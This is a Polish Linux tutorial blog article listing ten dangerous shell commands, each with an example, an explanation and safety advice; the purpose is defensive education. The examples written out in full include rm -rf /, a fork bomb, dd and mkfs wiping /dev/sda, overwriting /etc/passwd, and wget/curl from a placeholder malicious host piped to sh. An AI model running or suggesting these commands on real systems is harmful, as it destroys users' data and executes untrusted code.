Zamknij menu
    Nowe
    Intel processor on black motherboard

    Architektura i686 – historia, rozwój i możliwości procesorów 32-bitowych

    2025-11-06
    a computer screen with a program running on it

    Jaki Linux wybrać? Przewodnik po dystrybucjach, instalacji i konfiguracji

    2025-10-29
    Bloomreach

    Bloomreach – personalizacja, automatyzacja marketingu i zaawansowane rozwiązania

    2025-10-28
    Facebook X (Twitter) Instagram
    Linuksowo
    • Główna
    • Dystrybucje
    • Tematy
      • Administracja
      • Bezpieczeństwo
      • Instalacja
      • Oprogramowanie
      • Podstawy
      • Wybór systemu
      • Rozszerzenia plików
    • Pozostałe
    Linuksowo
    Główna»Pozostałe»10 niebezpiecznych poleceń Linuksa, których nie należy używać
    Pozostałe

    10 niebezpiecznych poleceń Linuksa, których nie należy używać

    Norbert BarwickiNorbert BarwickiBrak komentarzy4 min. czyt.
    Udostępnij
    Facebook Twitter LinkedIn Pinterest E-mail

    Niektóre polecenia w systemie Linux są niezwykle niebezpieczne, szczególnie jeśli zostaną użyte bez zrozumienia ich skutków. Poniżej znajdziesz rozbudowany poradnik prezentujący dziesięć najbardziej niebezpiecznych poleceń Linuksa, wyjaśnienia ich działania, zagrożenia, sposoby ich rozpoznania oraz dobre praktyki, które pozwolą Ci uniknąć krytycznych błędów.

    Spis treści pokaż
    1 1. rm -rf /
    2 2. :(){ :|: & };:
    3 3. mkfs.ext4 /dev/sda lub mkfs na istniejącym dysku
    4 4. >/etc/passwd lub echo coś >> /etc/shadow
    5 5. dd if=/dev/zero of=/dev/sda
    6 6. wget ... | sh lub curl ... | sh
    7 7. chmod -R 777 / lub chown -R
    8 8. mv /folder/* /dev/null
    9 9. kill -9 -1
    10 10. yes > /dev/sda
    11 Dobre praktyki bezpiecznej pracy w terminalu

    1. rm -rf /

    Opis –
    Polecenie to usuwa bezzwrotnie wszystkie pliki i katalogi z katalogu głównego systemu – razem z całą strukturą plików.

    Przykład użycia –

    rm -rf / 

    Dlaczego to niebezpieczne –
    Usuwa cały system operacyjny i dane bez możliwości ich odzyskania. Komenda ta nie prosi o potwierdzenie i nie zachowuje żadnych wersji kopii zapasowych.

    Jak się zabezpieczyć –

    • Nigdy nie uruchamiaj rm -rf na katalogu głównym / lub innych kluczowo ważnych katalogach systemowych.
    • Pracuj zawsze na precyzyjnie określonych ścieżkach.

    2. :(){ :|: & };:

    Opis –
    To tzw. fork bomb – specjalny łańcuch poleceń, który tworzy wykładniczo rosnącą liczbę procesów.

    Przykład użycia –

    :(){ :|:& };: 

    Dlaczego to niebezpieczne –
    Może całkowicie zablokować i „zamrozić” system, wyczerpując wszystkie zasoby procesora i pamięci RAM.

    Jak się zabezpieczyć –

    • Nie kopiuj do terminala podejrzanych jednolinijkowych poleceń, których działania nie rozumiesz.

    3. mkfs.ext4 /dev/sda lub mkfs na istniejącym dysku

    Opis –
    Polecenie formatuje wskazane urządzenie blokowe (dysk, partycję).

    Przykład użycia –

    mkfs.ext4 /dev/sda 

    Dlaczego to niebezpieczne –
    Bezpowrotnie usuwa wszystkie dane na urządzeniu wskazanym w poleceniu.

    Jak się zabezpieczyć –

    • Zawsze dokładnie sprawdzaj, które urządzenie zamierzasz formatować.
    • Twórz kopie zapasowe ważnych danych.

    4. >/etc/passwd lub echo coś >> /etc/shadow

    Opis –
    Przekierowanie wyjścia do krytycznych plików systemowych, np. pliku z hasłami.

    Przykład użycia –

    > /etc/passwd echo "test" >> /etc/shadow 

    Dlaczego to niebezpieczne –
    Możesz uszkodzić pliki odpowiedzialne za użytkowników i hasła – system może stać się nieużywalny, a dostęp do niego niemożliwy.

    Jak się zabezpieczyć –

    • Nigdy nie stosuj wyjścia poleceń do krytycznych plików systemowych bez pełnej świadomości skutków.

    5. dd if=/dev/zero of=/dev/sda

    Opis –
    Program dd potrafi wykonywać kopiowanie blokowe – w tym przypadku zerowanie całego dysku twardego.

    Przykład użycia –

    dd if=/dev/zero of=/dev/sda 

    Dlaczego to niebezpieczne –
    Całkowicie nadpisuje dane na dysku i czyni ich odzyskanie bardzo trudnym lub niemożliwym.

    Jak się zabezpieczyć –

    • Sprawdzaj opcje if (input file) oraz of (output file) w poleceniu dd i nigdy nie wskazuj nieumyślnie całych dysków lub partycji.

    6. wget ... | sh lub curl ... | sh

    Opis –
    Ściąganie skryptów z Internetu i bezpośrednie ich uruchamianie.

    Przykład użycia –

    wget http://złastrona.com/skrypt.sh | sh curl http://złastrona.com/skrypt.sh | sh 

    Dlaczego to niebezpieczne –
    Możesz uruchomić złośliwy kod bez żadnej weryfikacji.

    Jak się zabezpieczyć –

    • Zawsze pobieraj pliki skryptów najpierw do pliku, sprawdzaj ich zawartość i dopiero potem wykonuj.

    7. chmod -R 777 / lub chown -R

    Opis –
    Zmiana uprawnień dla wszystkich plików – w tym przypadkowo na plikach systemowych.

    Przykład użycia –

    chmod -R 777 / chown -R user:user / 

    Dlaczego to niebezpieczne –
    Możesz uczynić system podatnym na ataki lub spowodować niestabilność aplikacji/uruchomienia.

    Jak się zabezpieczyć –

    • Nigdy nie używaj rekursywnych opcji dla katalogu głównego.

    8. mv /folder/* /dev/null

    Opis –
    Przenoszenie zawartości do /dev/null oznacza trwałą utratę wszystkich przeniesionych danych.

    Przykład użycia –

    mv /home/user/* /dev/null 

    Dlaczego to niebezpieczne –
    Bezpowrotna utrata przenoszonych plików, ponieważ /dev/null to „czarna dziura” – cokolwiek tam trafi, znika na zawsze.

    Jak się zabezpieczyć –

    • Sprawdzaj cel przenoszenia/usuwania plików i katalogów.

    9. kill -9 -1

    Opis –
    Polecenie zabija wszystkie działające procesy użytkownika (w tym często systemowe demony).

    Przykład użycia –

    kill -9 -1 

    Dlaczego to niebezpieczne –
    Może spowodować zawieszenie całego systemu i utratę pracy, a nawet wymagać restartu serwera.

    Jak się zabezpieczyć –

    • Stosuj kill ostrożnie, określając konkretne PID-y.

    10. yes > /dev/sda

    Opis –
    Polecenie to bez przerwy wypisuje tekst do urządzenia blokowego, nadpisując je przypadkowymi danymi.

    Przykład użycia –

    yes > /dev/sda 

    Dlaczego to niebezpieczne –
    Szybko nadpisuje i uszkadza system plików, czyniąc dane nieodwracalnie utraconymi.

    Jak się zabezpieczyć –

    • Nigdy nie przekierowuj wyjścia poleceń do urządzeń blokowych.

    Dobre praktyki bezpiecznej pracy w terminalu

    • Zawsze czytaj i rozum polecenie przed jego uruchomieniem.
    • Używaj konta zwykłego użytkownika zamiast roota, gdy nie wykonujesz zadań administracyjnych.
    • Wykonuj regularne kopie zapasowe ważnych danych.
    • Zwracaj uwagę na pochodzenie skryptów, które pobierasz i uruchamiasz.
    • *Stosuj polecenia z minimalnym zasięgiem (np. działaj na konkretnym pliku, nie całym katalogu).
    • Monitoruj działania w terminalu poprzez korzystanie z polecenia history.

    Przestrzegając powyższych zasad i będąc świadomym najgroźniejszych poleceń, możesz znacząco zmniejszyć ryzyko poważnych awarii czy utraty danych pracując z Linuksem.

    Norbert Barwicki
    • WWW

    Norbert Barwicki pracuje z systemami Linux od 2007 roku, kiedy to zainstalował swoją pierwszą dystrybucję Ubuntu 7.04. Przez lata eksperymentował z ponad 15 różnymi dystrybucjami, w tym Fedora, Debian, Arch Linux i Gentoo, a od 2015 roku specjalizuje się w administracji serwerami opartymi na CentOS i Red Hat Enterprise Linux. Jako certyfikowany administrator Linux (RHCSA od 2018 roku) dzieli się swoją wiedzą na Linuksowo.pl, gdzie opublikował już ponad 100 artykułów pomagających użytkownikom w przejściu na świat open source.

    Pozostałe poradniki

    Man showing stress and frustration while working remotely on a laptop indoors.

    Jak skonfigurować plik fstab? Poradnik unikania błędów i zarządzania montowaniem partycji

    18 min. czyt.
    MacBook Air beside green leadf

    dd w Linux – zastosowania, ryzyka i alternatywy

    10 min. czyt.

    Jak skonfigurować pule pamięci masowej ZFS na Ubuntu?

    3 min. czyt.

    Jak sformatować dysk USB w systemie Linux (Ubuntu)?

    3 min. czyt.

    Jak przeglądać tabele partycji dysku w systemie Linux? 4 polecenia

    3 min. czyt.

    Jak wyświetlić listę partycji dysku twardego w Linuksie?

    3 min. czyt.
    Dodaj komentarz
    Odpowiedz Anuluj


    Poradniki
    Intel processor on black motherboard

    Architektura i686 – historia, rozwój i możliwości procesorów 32-bitowych

    2025-11-06
    a computer screen with a program running on it

    Jaki Linux wybrać? Przewodnik po dystrybucjach, instalacji i konfiguracji

    2025-10-29
    Bloomreach

    Bloomreach – personalizacja, automatyzacja marketingu i zaawansowane rozwiązania

    2025-10-28

    Jak wybrać najlepsze środowisko graficzne Linux? Zalety i wady GNOME, KDE Plazma, Xfce i innych

    2025-10-26
    Artykuły
    turned-on flat screen television

    XBMC – jak wykorzystać otwarty kod źródłowy do stworzenia centrum rozrywki?

    2025-10-21
    black usb flash drive on white surface

    Jak zainstalować dystrybucję Linuksa za pomocą unetbootin? Tworzenie bootowalnego Live USB

    2025-10-17
    black and orange computer keyboard

    Jak naprawić brak polskich znaków na klawiaturze i uniknąć problemów w przyszłości?

    2025-10-15
    O Linuksowo

    Linuksowo.pl to kompendium wiedzy dla wszystkich zainteresowanych systemami operacyjnymi opartymi na jądrze Linux. Oferujemy eksperckie artykuły obejmujące dystrybucje, instalację, bezpieczeństwo oraz oprogramowanie open source. Naszym celem jest dostarczanie praktycznych porad zarówno dla początkujących, jak i zaawansowanych użytkowników.

    © 2025 Linuksowo – Wszelkie prawa zastrzeżone.
    • Strona główna
    • O Linuksowo
    • Polityka prywatności i cookies
    • RSS
    • Kontakt

    Type above and press Enter to search. Press Esc to cancel.